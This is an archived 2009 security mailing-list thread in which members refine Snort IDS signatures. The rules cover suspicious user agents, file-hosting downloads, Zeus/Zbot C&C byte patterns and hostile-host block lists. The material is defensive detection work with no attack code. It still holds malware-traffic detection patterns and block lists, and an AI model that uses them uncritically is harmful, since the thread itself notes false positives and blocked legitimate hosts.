classtype:trojan-activity;
reference:url,doc.emergingthreats.net/bin/view/Main/2002400;
reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/MALWARE/MALWARE_USER_Agents;
sid:2002400; rev:16;)

From emerging at emergingthreats.net  Tue May  5 16:00:10 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Tue,  5 May 2009 16:00:10 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20090505200010.AD6EC4504A@goliath.jonkmans.com>


[***] Results from Oinkmaster started Tue May  5 16:00:10 2009 [***]

[///]     Modified active rules:     [///]

 2002750 - ET POLICY Reserved IP Space Traffic - Bogon Nets 2 (emerging-policy.rules)


[+++]      Added non-rule lines:     [+++]

     -> Added to emerging-sid-msg.map (2):
        2500133 || ET COMPROMISED Known Compromised or Hostile Host Traffic (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510133 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

     -> Added to emerging-sid-msg.map.txt (2):
        2500133 || ET COMPROMISED Known Compromised or Hostile Host Traffic (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510133 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts


From frank at knobbe.us  Tue May  5 16:45:45 2009
From: frank at knobbe.us (Frank Knobbe)
Date: Tue, 05 May 2009 15:45:45 -0500
Subject: [Emerging-Sigs] ET MALWARE Suspicious User Agent (Microsoft
 Internet Explorer)
In-Reply-To: <20090505172808.51FD1A402B@medusa.richmond-family.org>
References: <20090505172808.51FD1A402B@medusa.richmond-family.org>
Message-ID: <1241556345.45824.19.camel@localhost>

On Tue, 2009-05-05 at 13:28 -0400, Nathaniel Richmond wrote:
> SID 2002400 will trigger on GETs to "Host: vmware.com" or "Host:
> live.com" because of the preceding dot in the negation for
> vmware.com and live.com. I'm getting some non-malicious hits on this
> signature. I believe vmware may use this as a user-agent when
> checking for updates from a Windows host.
> 
> Removing the leading dot would allow something like fakevmware.com,
> but an alternative is to modify by adding 'content:!"Host|3A|
> vmware.com"', for example.
> 
> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET
> MALWARE Suspicious User Agent (Microsoft Internet Explorer)"; flow:
> to_server,established; content:"User-Agent\: Microsoft Internet
> Explorer"; content:!"bbc.co.uk"; nocase; content:!"microsoft.com";
> nocase; content:!".vmware.com"; nocase; content:!"msn.com"; nocase;
> content:!".live.com"; nocase; threshold:type limit, track by_src,
> count 2, seconds 360; reference:url,www.topinstalls.com;
> classtype:trojan-activity;
> reference:url,doc.emergingthreats.net/bin/view/Main/2002400;
> reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/MALWARE/MALWARE_USER_Agents;
> sid:2002400; rev:16;)


There are many other sites that could be added as well, since I believe
an popular RSS reader uses that user agent.

Perhaps it is time for that signature to be removed? Do I hear a
second? 

Cheers,
Frank



-- 
It is said that the Internet is a public utility. As such, it is best
compared to a sewer. A big, fat pipe with a bunch of crap sloshing
against your ports.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 188 bytes
Desc: This is a digitally signed message part
Url : http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090505/acc6f252/attachment.bin

From cunningpike at gmail.com  Tue May  5 18:19:36 2009
From: cunningpike at gmail.com (CunningPike)
Date: Tue, 05 May 2009 15:19:36 -0700
Subject: [Emerging-Sigs] ET MALWARE Suspicious User Agent (Microsoft
 Internet Explorer)
In-Reply-To: <1241556345.45824.19.camel@localhost>
References: <20090505172808.51FD1A402B@medusa.richmond-family.org>
	<1241556345.45824.19.camel@localhost>
Message-ID: <1241561976.15728.2.camel@arodgers-panasonic>

On Tue, 2009-05-05 at 15:45 -0500, Frank Knobbe wrote:
> On Tue, 2009-05-05 at 13:28 -0400, Nathaniel Richmond wrote:
> > SID 2002400 will trigger on GETs to "Host: vmware.com" or "Host:
> > live.com" because of the preceding dot in the negation for
> > vmware.com and live.com. I'm getting some non-malicious hits on this
> > signature. I believe vmware may use this as a user-agent when
> > checking for updates from a Windows host.

<snip>

> There are many other sites that could be added as well, since I believe
> an popular RSS reader uses that user agent.
> 
> Perhaps it is time for that signature to be removed? Do I hear a
> second? 
> 
> Cheers,
> Frank

Seconded.

CP
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 197 bytes
Desc: This is a digitally signed message part
Url : http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090505/b6107d80/attachment.bin

From jim.mcquaid at gmail.com  Wed May  6 07:17:55 2009
From: jim.mcquaid at gmail.com (James McQuaid)
Date: Wed, 6 May 2009 07:17:55 -0400
Subject: [Emerging-Sigs] Rar detection coming from china
Message-ID: <fe7b01530905060417h72f3bc5bicebf7856cc3f052f@mail.gmail.com>

HostFresh was the network most closely associated with Russian
organized crime.  As with networks based in the U.S. and Europe,
Russian criminals have used Chinese networks.  They change IP
addresses frequently to evade IP blocking, and as a consequence of
domain suspensions.  I took a look at this specific IP address; this
operation appears to be native to China.

James

> Message: 1
> Date: Tue, 5 May 2009 10:29:59 +0200
> From: Thierry CHICH <thierry.chich at ac-clermont.fr>
> Subject: [Emerging-Sigs] Rar detection coming from china
> To: emerging-sigs at emergingthreats.net
> Message-ID: <200905051029.59792.thierry.chich at ac-clermont.fr>
> Content-Type: text/plain; charset="iso-8859-1"
>
>
> Yesterday, on the net I manage, all the bad rar downloaded by trojans are
> coming from this unique address 221.1.204.243.
> Is it something to think about that ? Is "China netcom" considered in the same
> way some russian providers are ?
>
>
> --
> Thierry CHICH
> Equipe R?seaux / Rectorat de Clermont-Ferrand
> Tel: +33 4 73 99 30 54
> -------------- next part --------------
> An HTML attachment was scrubbed...
> URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090505/6f4705c5/attachment-0001.html


-- 
James McQuaid
http://www.jamesmcquaid.com

From juanma at ossim.net  Wed May  6 08:15:21 2009
From: juanma at ossim.net (Juan Manuel Lorenzo)
Date: Wed, 6 May 2009 14:15:21 +0200
Subject: [Emerging-Sigs] Megaupload Badongo Mediafire and Gigasize
Message-ID: <bc8fdf040905060515g71ccc540h573e21df06ef572b@mail.gmail.com>

Hi,

Here you have some rules to detect file downloads from some file storage web
pages.

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET POLICY
Megaupload file download access"; flow:to_server,established; content:"GET
"; depth: 4; uricontent:"/?d="; content:"Host\:"; nocase; content:"
megaupload.com"; nocase; classtype:policy-violation;  sid:1000010101;
rev:1;)
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET POLICY Badongo
file download access"; flow:to_server,established; content:"GET "; depth: 4;
uricontent:"/file/"; content:"Host\:"; nocase; content:"badongo.com";
nocase; content:"Cookie\: badongoL="; classtype:policy-violation;
sid:1000010102; rev:1;)
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET POLICY
MediaFire file download access"; flow:to_server,established; content:"GET ";
depth: 4; uricontent:"/?"; content:"Host\:"; nocase; content:"mediafire.com";
nocase; classtype:policy-violation;  sid:1000010103; rev:1;)
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET POLICY
Gigasize file download access"; flow:to_server,established; content:"GET ";
depth: 4; uricontent:"/get.php"; content:"Host\:"; nocase; content:"
gigasize.com"; nocase; classtype:policy-violation;  sid:1000010104; rev:1;)


Juan Manuel Lorenzo

=====================
juanma at ossim.net
jmlorenzo at alienvault.com
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090506/ae8f2da8/attachment.html

From jonkman at jonkmans.com  Wed May  6 10:08:06 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Wed, 06 May 2009 10:08:06 -0400
Subject: [Emerging-Sigs] ET MALWARE Suspicious User Agent (Microsoft
 Internet Explorer)
In-Reply-To: <1241561976.15728.2.camel@arodgers-panasonic>
References: <20090505172808.51FD1A402B@medusa.richmond-family.org>	<1241556345.45824.19.camel@localhost>
	<1241561976.15728.2.camel@arodgers-panasonic>
Message-ID: <4A0199C6.2000101@jonkmans.com>

But... I really like this one!!

Lots of malware using it!

But perhaps you're right. How about it goes commented out by default?
Run it if it works for your net?

Matt

CunningPike wrote:
> On Tue, 2009-05-05 at 15:45 -0500, Frank Knobbe wrote:
>> On Tue, 2009-05-05 at 13:28 -0400, Nathaniel Richmond wrote:
>>> SID 2002400 will trigger on GETs to "Host: vmware.com" or "Host:
>>> live.com" because of the preceding dot in the negation for
>>> vmware.com and live.com. I'm getting some non-malicious hits on this
>>> signature. I believe vmware may use this as a user-agent when
>>> checking for updates from a Windows host.
> 
> <snip>
> 
>> There are many other sites that could be added as well, since I believe
>> an popular RSS reader uses that user agent.
>>
>> Perhaps it is time for that signature to be removed? Do I hear a
>> second? 
>>
>> Cheers,
>> Frank
> 
> Seconded.
> 
> CP
> 
> 
> ------------------------------------------------------------------------
> 
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs

-- 
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc



From jonkman at jonkmans.com  Wed May  6 12:30:01 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Wed, 06 May 2009 12:30:01 -0400
Subject: [Emerging-Sigs] Megaupload Badongo Mediafire and Gigasize
In-Reply-To: <bc8fdf040905060515g71ccc540h573e21df06ef572b@mail.gmail.com>
References: <bc8fdf040905060515g71ccc540h573e21df06ef572b@mail.gmail.com>
Message-ID: <4A01BB09.9040904@jonkmans.com>

These look good. I'll put a within for the domain name/host header. But
other than that good to go.

Thanks Juan!

Matt

Juan Manuel Lorenzo wrote:
> Hi,
> 
> Here you have some rules to detect file downloads from some file storage
> web pages.
> 
> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET POLICY
> Megaupload file download access"; flow:to_server,established;
> content:"GET "; depth: 4; uricontent:"/?d="; content:"Host\:"; nocase;
> content:"megaupload.com <http://megaupload.com>"; nocase;
> classtype:policy-violation;  sid:1000010101; rev:1;)
> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET POLICY
> Badongo file download access"; flow:to_server,established; content:"GET
> "; depth: 4; uricontent:"/file/"; content:"Host\:"; nocase;
> content:"badongo.com <http://badongo.com>"; nocase; content:"Cookie\:
> badongoL="; classtype:policy-violation;  sid:1000010102; rev:1;)
> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET POLICY
> MediaFire file download access"; flow:to_server,established;
> content:"GET "; depth: 4; uricontent:"/?"; content:"Host\:"; nocase;
> content:"mediafire.com <http://mediafire.com>"; nocase;
> classtype:policy-violation;  sid:1000010103; rev:1;)
> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET POLICY
> Gigasize file download access"; flow:to_server,established; content:"GET
> "; depth: 4; uricontent:"/get.php"; content:"Host\:"; nocase;
> content:"gigasize.com <http://gigasize.com>"; nocase;
> classtype:policy-violation;  sid:1000010104; rev:1;)
> 
> 
> Juan Manuel Lorenzo
> 
> =====================
> juanma at ossim.net <mailto:juanma at ossim.net>
> jmlorenzo at alienvault.com <mailto:jmlorenzo at alienvault.com>
> 
> 
> ------------------------------------------------------------------------
> 
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs

-- 
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc



From jonkman at jonkmans.com  Wed May  6 13:00:51 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Wed, 06 May 2009 13:00:51 -0400
Subject: [Emerging-Sigs] RBN blocks blocking indian registrar mitsu.in
In-Reply-To: <4A006B24.2080005@secnap.net>
References: <4A006B24.2080005@secnap.net>
Message-ID: <4A01C243.6090602@jonkmans.com>

Checking with Jim, more shortly

Matt

Michael Scheidell wrote:
> looks like your RBN blocks lists are blocking the .in registrar.
> 
> not a good idea.
> 
> 
> grep  67.15.47.4 /var/log/snort.log
> May  5 12:23:19 scanner snort[14078]: [1:2407153:127] ET RBN Known
> Russian Business Network Monitored Domains - BLOCKING (154)
> [Classification: Misc Attack] [Priority: 2]: <trust0> {TCP} 67.15.47.4:80
> 
> host www.mitsu.in
> www.mitsu.in is an alias for indiandomains.supersite.myorderbox.com.
> indiandomains.supersite.myorderbox.com has address 67.15.184.7
> 
> 
> also, 67.15.47.7  67.15.47.3.. (their dns servers)
> 
> 
> 
> 
> -- 
> Michael Scheidell, CTO
> Phone: 561-999-5000, x 1259
>> *| *SECNAP Network Security Corporation
> 
>     * Certified SNORT Integrator
>     * 2008-9 Hot Company Award Winner, World Executive Alliance
>     * Five-Star Partner Program 2009, VARBusiness
>     * Best Anti-Spam Product 2008, Network Products Guide
>     * King of Spam Filters, SC Magazine 2008
> 
> 
> ------------------------------------------------------------------------
> 
> This email has been scanned and certified safe by SpammerTrap?.
> For Information please see www.secnap.com/products/spammertrap/
> <http://www.secnap.com/products/spammertrap/>
> 
> ------------------------------------------------------------------------
> 
> 
> ------------------------------------------------------------------------
> 
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs

-- 
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc



From jonkman at jonkmans.com  Wed May  6 13:29:21 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Wed, 06 May 2009 13:29:21 -0400
Subject: [Emerging-Sigs] Zbot,Zues,WsPoem > v1.2.x.x Signatures
In-Reply-To: <1241532428.6818.7.camel@kinta>
References: <D3FE430B-D025-4342-9820-D5CF8A8B1E66@packetninjas.net>
	<1241532428.6818.7.camel@kinta>
Message-ID: <4A01C8F1.1030206@jonkmans.com>

So what's the consensus on these? Good to post or is there more info we
need on them?

Thanks by the way!

Matt

dxp wrote:
> Daniel,
> 
> I think these signatures will have many False Negatives due to the fact
> that they will be detecting only the trojan which you've obtained
> traffic captures from.  Zeus versions 1.2.x.x use RC4 encryption in all
> C&C communication thus data will only match for those which use the same
> key.
> 
> The reason why there are similar bytes in three of the captures is due
> to same header in all those POSTs which are encrypted with the same
> key.  Once the key is changed, which is unique per botnet and can easily
> change at the will of the botmaster, the signatures won't prodive detection.
> 
> Basically, from the perspective of IDS it only sees random bytes in the
> POST.  The only thing which is static is the minimum amount of bytes
> which must be present for a valid record.  However, within those bytes
> there's nothing unique.
> 
> -  
> 
> -=[ dxp ]=-
> 0xA3F3C6E3
> 
> 
> 
> 
> On Tue, 2009-05-05 at 00:24 -0500, Daniel Clemens wrote:
>>
>> alert tcp any any -> $EXTERNAL_NET $HTTP_PORTS
>> (msg:"ETC Zbot/Zues/WsPoem > v1.2.x.x POST";
>> flow:established,to_server;content:"POST";depth:5;
>> content:"|e5 c6 80 37 55 67 da  
>> e5|";flowbits:noalert;flowbits:set,Zlob.POST;
>> reference:url,www.packetninjas.net/?p=586;classtype:trojan-activity;sid:xxx;rev:1;)
>>
>>
>> alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any
>> (msg:"ETC Zbot/Zues/WsPoem > v1.2.x.x Server Response";
>> flow:established,to_client;content:"|29 69 7f 1f e5 c6 80 37 5f 67 da  
>> e5 1a 21 71 4c|";
>> content:"|d8 ee 78 25 99 7f 6f 62 09 fe 1f 6c 91 cc 52 7b|";content:"| 
>> b0 d2 ef 20 9e 7a 34 80 14 f3 cc 3d 51 7b|";
>> flowbits:isset,Zlob.POST;reference:url,www.packetninjas.net/?p=586;classtype:trojan-activity;sid:xxx 
>> ; rev:1;)
>>
>> Similarities in initial POSTS:
>>
>>
>> Responses:
>>
>>
>>
>> Other links which include information about Zbot,Zues,WsPoem:
>> http://dxp2532.blogspot.com/2009/04/zeus-zbot-prg-ntos-wsnpoem.html
>> http://blogs.technet.com/mmpc/archive/2008/10/10/malware-writer-wants-an-eye-to-eye-with-us.aspx
>> http://blog.s21sec.com/2009/04/when-bot-master-goes-mad-kill-os.html
>> http://www.malwaredomainlist.com/forums/index.php?topic=2514.msg7621#msg7621
>> http://sunbeltblog.blogspot.com/2009/01/sriurz-sez-hello-from-russia.html
>> http://www.threatexpert.com/blog/zbot/DecodeZeusConfig.zip
>> http://garwarner.blogspot.com/2008/11/enlisting-your-bank-to-steal-your.html
>>
>> Older Historical Quotes for context:
>> Botnet-controlled Trojan robbing online bank customers
>> Security firm says malware targeting commercial customers believed to
>> have come from Russia
>> By Ellen Messmer, Network World, 12/13/07
>>
>> "It's been very successful since we've first seen this at the end of
>> November," says Don Jackson, senior security researcher at SecureWorks,
>> which believes the Prg Trojan variant is designed by the Russian hackers
>> group known as Russian UpLevel working with some German affiliates.
>>
>> | Daniel Uriah Clemens
>> | Packetninjas L.L.C | | http://www.packetninjas.net
>> | c. 205.567.6850      | | o. 866.267.8851
>> "The secret to creativity is knowing how to hide your sources" Einstein
>>
>> _______________________________________________
>> Emerging-sigs mailing list
>> Emerging-sigs at emergingthreats.net <mailto:Emerging-sigs at emergingthreats.net>
>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
> 
> ------------------------------------------------------------------------
> 
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs

-- 
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc



From jonkman at jonkmans.com  Wed May  6 14:22:22 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Wed, 06 May 2009 14:22:22 -0400
Subject: [Emerging-Sigs] IP address on Spamhaus (Spam BlackList)
In-Reply-To: <53834cf20905040755i1686ab10qd328d057957f089@mail.gmail.com>
References: <53834cf20905040755i1686ab10qd328d057957f089@mail.gmail.com>
Message-ID: <4A01D55E.5090207@jonkmans.com>

Ya, that sig would surely work. So you're looking to be able to block
folks that get rejected by spamhaus?

Matt

Jaime Blasco wrote:
> Hi!
> 
> I've been analyzing some spam traffic, related to snort's rule:
> policy.rules:alert tcp $SMTP_SERVERS 25 -> $EXTERNAL_NET any
> (msg:"POLICY SMTP relaying denied"; flow:established,from_server;
> content:"550 5.7.1"; depth:70; reference:arachnids,249;
> reference:url,mail-abuse.org/tsi/ar-fix.html
> <http://mail-abuse.org/tsi/ar-fix.html>; classtype:misc-activity;
> sid:567; rev:11;)
> 
> we could write a rule to detect smtp responses like this:
> 553 Mail from *.*.* not allowed - 5.7.1 [BL23] Connections not accepted
> from IP addresses on Spamhaus XBL; see
> http://postmaster.yahoo.com/550-bl23.html [550]
> 
> alert tcp $EXTERNAL_NET 25 -> $HOME_NET any (msg:"ET POLICY IP address
> BlackListed (Spamhaus)"; flow:established,from_server; content:"553 Mail
> from"; content:"Spamhaus XBL"; classtype:misc-activity; sid:; rev:1;)
> 
> Regards
> 
> -- 
> _______________________________
> 
> Jaime Blasco
> 
> www.ossim.com <http://www.ossim.com>
> www.alienvault.com <http://www.alienvault.com>
> Email: jaime.blasco at alienvault.com <mailto:jaime.blasco at alienvault.com>
> 
> 
> ------------------------------------------------------------------------
> 
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs

-- 
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc



From dxp2532 at gmail.com  Wed May  6 15:22:53 2009
From: dxp2532 at gmail.com (dxp)
Date: Wed, 06 May 2009 15:22:53 -0400
Subject: [Emerging-Sigs] Zbot,Zues,WsPoem > v1.2.x.x Signatures
In-Reply-To: <4A01C8F1.1030206@jonkmans.com>
References: <D3FE430B-D025-4342-9820-D5CF8A8B1E66@packetninjas.net>
	<1241532428.6818.7.camel@kinta>  <4A01C8F1.1030206@jonkmans.com>
Message-ID: <1241637773.6818.41.camel@kinta>

Technically it'll detect that particular trojan until the key or data size changes.
So, it's worth keeping for a while, perhaps current events, just not sure for how long.

However, if the IP/Domain it sends data to is already on the block list from Zeus tracker
then this sig maybe redundant.

-  

-=[ dxp ]=-
0xA3F3C6E3




On Wed, 2009-05-06 at 13:29 -0400, Matt Jonkman wrote:

> So what's the consensus on these? Good to post or is there more info we
> need on them?
> 
> Thanks by the way!
> 
> Matt
> 
> dxp wrote:
> > Daniel,
> > 
> > I think these signatures will have many False Negatives due to the fact
> > that they will be detecting only the trojan which you've obtained
> > traffic captures from.  Zeus versions 1.2.x.x use RC4 encryption in all
> > C&C communication thus data will only match for those which use the same
> > key.
> > 
> > The reason why there are similar bytes in three of the captures is due
> > to same header in all those POSTs which are encrypted with the same
> > key.  Once the key is changed, which is unique per botnet and can easily
> > change at the will of the botmaster, the signatures won't prodive detection.
> > 
> > Basically, from the perspective of IDS it only sees random bytes in the
> > POST.  The only thing which is static is the minimum amount of bytes
> > which must be present for a valid record.  However, within those bytes
> > there's nothing unique.
> > 
> > -  
> > 
> > -=[ dxp ]=-
> > 0xA3F3C6E3
> > 
> > 
> > 
> > 
> > On Tue, 2009-05-05 at 00:24 -0500, Daniel Clemens wrote:
> >>
> >> alert tcp any any -> $EXTERNAL_NET $HTTP_PORTS
> >> (msg:"ETC Zbot/Zues/WsPoem > v1.2.x.x POST";
> >> flow:established,to_server;content:"POST";depth:5;
> >> content:"|e5 c6 80 37 55 67 da  
> >> e5|";flowbits:noalert;flowbits:set,Zlob.POST;
> >> reference:url,www.packetninjas.net/?p=586;classtype:trojan-activity;sid:xxx;rev:1;)
> >>
> >>
> >> alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any
> >> (msg:"ETC Zbot/Zues/WsPoem > v1.2.x.x Server Response";
> >> flow:established,to_client;content:"|29 69 7f 1f e5 c6 80 37 5f 67 da  
> >> e5 1a 21 71 4c|";
> >> content:"|d8 ee 78 25 99 7f 6f 62 09 fe 1f 6c 91 cc 52 7b|";content:"| 
> >> b0 d2 ef 20 9e 7a 34 80 14 f3 cc 3d 51 7b|";
> >> flowbits:isset,Zlob.POST;reference:url,www.packetninjas.net/?p=586;classtype:trojan-activity;sid:xxx 
> >> ; rev:1;)
> >>
> >> Similarities in initial POSTS:
> >>
> >>
> >> Responses:
> >>
> >>
> >>
> >> Other links which include information about Zbot,Zues,WsPoem:
> >> http://dxp2532.blogspot.com/2009/04/zeus-zbot-prg-ntos-wsnpoem.html
> >> http://blogs.technet.com/mmpc/archive/2008/10/10/malware-writer-wants-an-eye-to-eye-with-us.aspx
> >> http://blog.s21sec.com/2009/04/when-bot-master-goes-mad-kill-os.html
> >> http://www.malwaredomainlist.com/forums/index.php?topic=2514.msg7621#msg7621
> >> http://sunbeltblog.blogspot.com/2009/01/sriurz-sez-hello-from-russia.html
> >> http://www.threatexpert.com/blog/zbot/DecodeZeusConfig.zip
> >> http://garwarner.blogspot.com/2008/11/enlisting-your-bank-to-steal-your.html
> >>
> >> Older Historical Quotes for context:
> >> Botnet-controlled Trojan robbing online bank customers
> >> Security firm says malware targeting commercial customers believed to
> >> have come from Russia
> >> By Ellen Messmer, Network World, 12/13/07
> >>
> >> "It's been very successful since we've first seen this at the end of
> >> November," says Don Jackson, senior security researcher at SecureWorks,
> >> which believes the Prg Trojan variant is designed by the Russian hackers
> >> group known as Russian UpLevel working with some German affiliates.
> >>
> >> | Daniel Uriah Clemens
> >> | Packetninjas L.L.C | | http://www.packetninjas.net
> >> | c. 205.567.6850      | | o. 866.267.8851
> >> "The secret to creativity is knowing how to hide your sources" Einstein
> >>
> >> _______________________________________________
> >> Emerging-sigs mailing list
> >> Emerging-sigs at emergingthreats.net <mailto:Emerging-sigs at emergingthreats.net>
> >> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
> > 
> > ------------------------------------------------------------------------
> > 
> > _______________________________________________
> > Emerging-sigs mailing list
> > Emerging-sigs at emergingthreats.net
> > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
> 
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090506/4ac03671/attachment-0001.html
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: This is a digitally signed message part
Url : http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090506/4ac03671/attachment-0001.bin

From frank at knobbe.us  Wed May  6 15:59:36 2009
From: frank at knobbe.us (Frank Knobbe)
Date: Wed, 06 May 2009 14:59:36 -0500
Subject: [Emerging-Sigs] ET MALWARE Suspicious User Agent (Microsoft
 Internet Explorer)
In-Reply-To: <4A0199C6.2000101@jonkmans.com>
References: <20090505172808.51FD1A402B@medusa.richmond-family.org>
	<1241556345.45824.19.camel@localhost>
	<1241561976.15728.2.camel@arodgers-panasonic>
	<4A0199C6.2000101@jonkmans.com>
Message-ID: <1241639976.88470.18.camel@localhost>

On Wed, 2009-05-06 at 10:08 -0400, Matt Jonkman wrote:
> But... I really like this one!!
> 
> Lots of malware using it!
> 
> But perhaps you're right. How about it goes commented out by default?
> Run it if it works for your net?

Nah, I'd leave it in enabled. Folks can disable it themselves if they
like.

FWIW, I have yet to catch malware with that sig :)

-Frank

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 188 bytes
Desc: This is a digitally signed message part
Url : http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090506/0a67194d/attachment.bin

From frank at knobbe.us  Wed May  6 16:01:22 2009
From: frank at knobbe.us (Frank Knobbe)
Date: Wed, 06 May 2009 15:01:22 -0500
Subject: [Emerging-Sigs] IP address on Spamhaus (Spam BlackList)
In-Reply-To: <4A01D55E.5090207@jonkmans.com>
References: <53834cf20905040755i1686ab10qd328d057957f089@mail.gmail.com>
	<4A01D55E.5090207@jonkmans.com>
Message-ID: <1241640082.88470.20.camel@localhost>

On Wed, 2009-05-06 at 14:22 -0400, Matt Jonkman wrote:
> Ya, that sig would surely work. So you're looking to be able to block
> folks that get rejected by spamhaus?

I think that's counter-productive since the signature alerts on when YOU
are rejected. I wouldn't want to block myself :)

The sig could work in detecting if one self has been black-listed.
Though usually folks find out with bounced emails :)

Cheers,
Frank

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 188 bytes
Desc: This is a digitally signed message part
Url : http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090506/5dba7586/attachment.bin

From emerging at emergingthreats.net  Wed May  6 16:00:10 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Wed,  6 May 2009 16:00:10 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20090506200010.C5E8F4501B@goliath.jonkmans.com>


[***] Results from Oinkmaster started Wed May  6 16:00:10 2009 [***]

[+++]          Added rules:          [+++]

 2009301 - ET POLICY Megaupload file download service access (emerging-policy.rules)
 2009302 - ET POLICY Badongo file download service access (emerging-policy.rules)
 2009303 - ET POLICY MediaFire file download service access (emerging-policy.rules)
 2009304 - ET POLICY Gigasize file download service access (emerging-policy.rules)
 2009305 - ET TROJAN Zlob post installation checkin (.php?inst_result=&hwid) (emerging-virus.rules)


[+++]      Added non-rule lines:     [+++]

     -> Added to emerging-policy.rules (1):
        #by Juan Manuel Lorenzo at ossim

     -> Added to emerging-sid-msg.map (13):
        2009301 || ET POLICY Megaupload file download service access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/POLICY/POLICY_Download_Services || url,doc.emergingthreats.net/2009301
        2009302 || ET POLICY Badongo file download service access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/POLICY/POLICY_Download_Services || url,doc.emergingthreats.net/2009302
        2009303 || ET POLICY MediaFire file download service access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/POLICY/POLICY_Download_Services || url,doc.emergingthreats.net/2009303
        2009304 || ET POLICY Gigasize file download service access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/POLICY/POLICY_Download_Services || url,doc.emergingthreats.net/2009304
        2009305 || ET TROJAN Zlob post installation checkin (.php?inst_result=&hwid) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Zlob || url,doc.emergingthreats.net/2009305 || url,www.threatexpert.com/report.aspx?md5=1ca433d3f5538fda49c5defb59232f9d
        2500134 || ET COMPROMISED Known Compromised or Hostile Host Traffic (135) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500135 || ET COMPROMISED Known Compromised or Hostile Host Traffic (136) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500136 || ET COMPROMISED Known Compromised or Hostile Host Traffic (137) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
